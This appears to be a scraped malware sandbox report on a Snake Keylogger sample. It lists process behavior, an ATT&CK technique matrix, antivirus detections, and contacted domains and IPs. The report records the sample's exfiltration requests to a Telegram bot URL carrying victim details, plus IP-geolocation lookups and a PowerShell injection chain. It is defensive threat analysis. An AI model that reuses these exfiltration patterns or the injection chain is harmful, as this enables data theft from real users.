      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\4Vx2rUlb0f.exeCode function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406072

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000007.00000002.3052249542.0000000025251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000007.00000002.3052249542.0000000025251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation
      1
      DLL Side-Loading
      1
      Access Token Manipulation
      11
      Masquerading
      OS Credential Dumping11
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Web Service
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts2
      PowerShell
      Boot or Logon Initialization Scripts311
      Process Injection
      21
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Clipboard Data
      11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Access Token Manipulation
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive3
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
      Process Injection
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture3
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA Secrets1
      System Network Configuration Discovery
      SSHKeylogging14
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing
      Cached Domain Credentials2
      File and Directory Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading
      DCSync14
      System Information Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588252 Sample: 4Vx2rUlb0f.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 35 reallyfreegeoip.org 2->35 37 api.telegram.org 2->37 39 4 other IPs or domains 2->39 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Multi AV Scanner detection for dropped file 2->45 51 6 other signatures 2->51 8 4Vx2rUlb0f.exe 29 2->8         started        signatures3 47 Tries to detect the country of the analysis system (by using the IP) 35->47 49 Uses the Telegram API (likely for C&C communication) 37->49 process4 file5 21 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->21 dropped 23 C:\Users\user\AppData\...\prelusory.Tuk206, Unicode 8->23 dropped 53 Suspicious powershell command line found 8->53 12 powershell.exe 30 8->12         started        signatures6 process7 file8 25 C:\Users\user\AppData\...\4Vx2rUlb0f.exe, PE32 12->25 dropped 27 C:\Users\...\4Vx2rUlb0f.exe:Zone.Identifier, ASCII 12->27 dropped 55 Early bird code injection technique detected 12->55 57 Writes to foreign memory regions 12->57 59 Found suspicious powershell code related to unpacking or dynamic code loading 12->59 61 3 other signatures 12->61 16 msiexec.exe 15 8 12->16         started        19 conhost.exe 12->19         started        signatures9 process10 dnsIp11 29 checkip.dyndns.com 132.226.247.73, 50004, 50007, 50009 UTMEMUS United States 16->29 31 api.telegram.org 149.154.167.220, 443, 50021 TELEGRAMRU United Kingdom 16->31 33 3 other IPs or domains 16->33

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      4Vx2rUlb0f.exe75%VirustotalBrowse
      4Vx2rUlb0f.exe65%ReversingLabsWin32.Spyware.Snakekeylogger
      4Vx2rUlb0f.exe100%Joe Sandbox ML
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\nsr8170.tmp\nsExec.dll0%ReversingLabs
      C:\Users\user\AppData\Local\neoimpressionism\Andengenerationsindvandrer\4Vx2rUlb0f.exe65%ReversingLabsWin32.Spyware.Snakekeylogger
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://www.skinstudio.netG0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      142.250.185.206
      truefalse
        high
        drive.usercontent.google.com
        142.250.184.193
        truefalse
          high
          reallyfreegeoip.org
          104.21.112.1
          truefalse
            high
            api.telegram.org
            149.154.167.220
            truefalse
              high
              checkip.dyndns.com
              132.226.247.73
              truefalse
                high
                checkip.dyndns.org
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://reallyfreegeoip.org/xml/8.46.123.189false
                    high
                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2004:46:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                      high
                      http://checkip.dyndns.org/false
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://api.telegram.orgmsiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.org/botmsiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000007.00000003.2833538108.0000000009632000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/Iconpowershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://drive.usercontent.google.com/msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20amsiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.orgmsiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://nsis.sf.net/NSIS_ErrorError4Vx2rUlb0f.exe, 00000000.00000000.1784950404.000000000040A000.00000008.00000001.01000000.00000003.sdmp, 4Vx2rUlb0f.exe, 00000000.00000002.1829718865.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
                                                    high
                                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.skinstudio.netG4Vx2rUlb0f.exe, 00000000.00000002.1829896250.0000000000453000.00000002.00000001.01000000.00000003.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.google.commsiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2693602382.0000000004E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://drive.google.com/msiexec.exe, 00000007.00000002.3037606643.00000000095CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.2693602382.0000000004F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contoso.com/powershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2698155602.0000000005E7C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://reallyfreegeoip.orgmsiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://reallyfreegeoip.orgmsiexec.exe, 00000007.00000002.3052249542.000000002534E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://drive.usercontent.google.com/:msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://apis.google.commsiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2833538108.000000000963D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://checkip.dyndns.commsiexec.exe, 00000007.00000002.3052249542.000000002539E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253BA000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3052249542.00000000253AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://api.telegram.orgmsiexec.exe, 00000007.00000002.3052249542.0000000025420000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2693602382.0000000004E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://drive.usercontent.google.com/4msiexec.exe, 00000007.00000002.3037606643.0000000009639000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      149.154.167.220
                                                                                      api.telegram.orgUnited Kingdom
                                                                                      62041TELEGRAMRUfalse
                                                                                      142.250.185.206
                                                                                      drive.google.comUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      104.21.112.1
                                                                                      reallyfreegeoip.orgUnited States
                                                                                      13335CLOUDFLARENETUSfalse
                                                                                      142.250.184.193
                                                                                      drive.usercontent.google.comUnited States
                                                                                      15169GOOGLEUSfalse
                                                                                      132.226.247.73
                                                                                      checkip.dyndns.comUnited States
                                                                                      16989UTMEMUSfalse
                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                      Analysis ID:1588252
                                                                                      Start date and time:2025-01-10 23:08:32 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 7m 50s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:8
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:4Vx2rUlb0f.exe
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:8806ce311854fa80261e855453c07d30b43a24d413c65cdfaae99024408bd6ff.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.evad.winEXE@6/13@5/5
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 33.3%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 95%
                                                                                      • Number of executed functions: 88
                                                                                      • Number of non-executed functions: 31
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Execution Graph export aborted for target msiexec.exe, PID 3192 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7576 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      TimeTypeDescription
                                                                                      17:09:36API Interceptor37x Sleep call for process: powershell.exe modified
                                                                                      17:11:26API Interceptor109x Sleep call for process: msiexec.exe modified
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      149.154.167.220Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                            6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                              JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                  V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                      6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                        SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          104.21.112.19MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.buyspeechst.shop/qzi3/
                                                                                                          QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                                                                                          • www.buyspeechst.shop/w98i/
                                                                                                          wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                          • beammp.com/phpmyadmin/
                                                                                                          132.226.247.739Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          oEQp0EklDb.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          ajRZflJ2ch.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          19d6P55zd1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          • checkip.dyndns.org/
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          checkip.dyndns.comYef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.8.169
                                                                                                          UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.8.169
                                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.8.169
                                                                                                          upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          reallyfreegeoip.orgYef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.112.1
                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.80.1
                                                                                                          UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 104.21.48.1
                                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.32.1
                                                                                                          VQsnGWaNi5.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.48.1
                                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.80.1
                                                                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.16.1
                                                                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 104.21.80.1
                                                                                                          V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 104.21.32.1
                                                                                                          upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 104.21.48.1
                                                                                                          api.telegram.orgYef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          TELEGRAMRUYef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          lsc5QN46NH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          6mGpn6kupm.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 149.154.167.220
                                                                                                          UTMEMUSb5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.8.169
                                                                                                          UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          • 132.226.8.169
                                                                                                          9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                          • 132.226.247.73
                                                                                                          JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
